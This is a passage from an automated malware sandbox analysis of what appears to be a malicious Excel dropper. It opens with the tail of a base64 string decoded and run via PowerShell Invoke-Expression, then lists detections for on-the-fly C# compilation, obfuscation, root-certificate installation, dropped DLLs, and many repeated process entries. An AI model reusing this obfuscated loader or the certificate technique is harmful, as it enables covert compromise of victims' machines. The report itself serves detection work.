luYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899D51F8 push ds; ret	8_2_000007FE899D5242
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899D022D push eax; iretd	8_2_000007FE899D0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899D00BD pushad ; iretd	8_2_000007FE899D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899D5813 push ebx; ret	8_2_000007FE899D583A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899D580D push ecx; ret	8_2_000007FE899D5812
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE899D583B push esp; ret	8_2_000007FE899D585A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_000007FE89AA096D pushad ; ret	8_2_000007FE89AA0991
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0041E922 push es; retf	27_2_0041E926
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_004032D0 push eax; ret	27_2_004032D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00401BD8 pushad ; ret	27_2_00401BDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_004163F3 push edi; retf	27_2_004164AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00416390 push cs; iretd	27_2_004163C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00416393 push cs; iretd	27_2_004163C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00404C4C push ebx; retf	27_2_00404CDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00416453 push edi; retf	27_2_004164AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00404C65 push ebx; retf	27_2_00404CDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00416438 push edi; retf	27_2_004164AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00423594 pushfd ; retf	27_2_00423595
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00414616 push ebp; ret	27_2_00414631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00414623 push ebp; ret	27_2_00414631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00418E31 push FFFFFFF1h; ret	27_2_00418E3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0041E6A0 pushfd ; ret	27_2_0041E6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0041EF45 push edi; retf	27_2_0041EF5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0041EF53 push edi; retf	27_2_0041EF5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0040CFAF push esp; retf	27_2_0040CFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A7DFA1 push ecx; ret	27_2_00A7DFB4

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Contains functionality for execution timing, often used to detect debuggers

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
